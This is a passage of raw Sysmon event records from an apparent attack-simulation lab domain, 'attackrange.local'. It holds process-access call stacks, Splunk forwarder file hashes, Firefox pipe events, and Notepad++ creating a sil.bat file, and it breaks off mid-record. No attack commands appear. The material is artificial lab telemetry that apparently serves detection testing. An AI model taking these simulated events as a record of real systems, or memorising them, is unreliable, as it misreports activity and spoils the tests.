10341000x80000000000000001046306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.188{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5A3C8593E82D29664F3787259A9DA27,SHA256=F250575B6866B786E7DD17850DB3F289C3029507664B5C95959DA0BCD7BA59FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806221Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:04.972{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70523A397E49FBE0F104DC9D88633F0B,SHA256=624BDBC95E2605F55EFCB549906BA7E0C0567FF6D99A39661469D959C523BFF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:04.754{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67C81478DF0D8F416C51AE3ED34C2D1A,SHA256=421832B6BD625ACE8673263D4FC1AA1D22A8E7FD2EE1EE9D7EC0534D47C939F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:04.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CE20666FB96508EBED0BE6DE0EBDEB36,SHA256=A888477990D04CA54E85EB7406D2476F4F2242923DD89AA26B544C760C685207,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:04.204{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D1F466A2571EFDEF895492EC62D18FB,SHA256=4AF5D718CB99C382D508F66626AC298AEC9D5F42906B1B259553DDF304E46305,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806222Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:05.972{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C64A7F2C0158B59B8F3C915C7BF470C9,SHA256=07774EB211BC7B768D5F593B2795241875E8F1D48F4E35A46094EE327F4B31BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:05.219{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D72DA320E01B870542450ECC0D138F96,SHA256=DF58F477DD82E20A35FEDBD8DF12449B29E4F846F0FD3AF89CD72F9F0CEA5BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806223Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:06.987{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2CF44981452B1AD0BD78BD4D8F07291,SHA256=32CCF55162CC8236EB745EC1DA26AC2737286FEDD34CAF2DE6B61117B248FFBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.619{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\sil.bat@2021-07-12_074455MD5=42C6E3878971CD6C021BE6EC19E67ECE,SHA256=371CF11D7C4C74777B864345F740C71BCFA824D7DEF1E0114EBB6F5F6C86C609,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.619{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sil.bat2021-07-12 07:44:38.363 23542300x80000000000000001046365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.619{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sil.batMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.254{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D1E46714E1A4C25A1A2D43747343CD3,SHA256=46280B27FE1154D05100167778FBFFE7D2EF2BA1CAEB7D1DFA401CFE38D78E45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.134{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.087{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5CC7-60E8-0D11-00000000CF01}7760C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001046361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.087{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5CC7-60E8-0D11-00000000CF01}7760C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001046360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:45:06.087{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7760.375.29551504C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001046359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:45:06.087{466BC892-5CC7-60E8-0D11-00000000CF01}7760\chrome.7760.375.29551504C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000806224Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:07.987{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=484CA919A5FC2644C90BC471D7A35938,SHA256=8AAE2581CFB035B65812CF8399C79F60FA6146B62417AEC560E1361BC59626A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 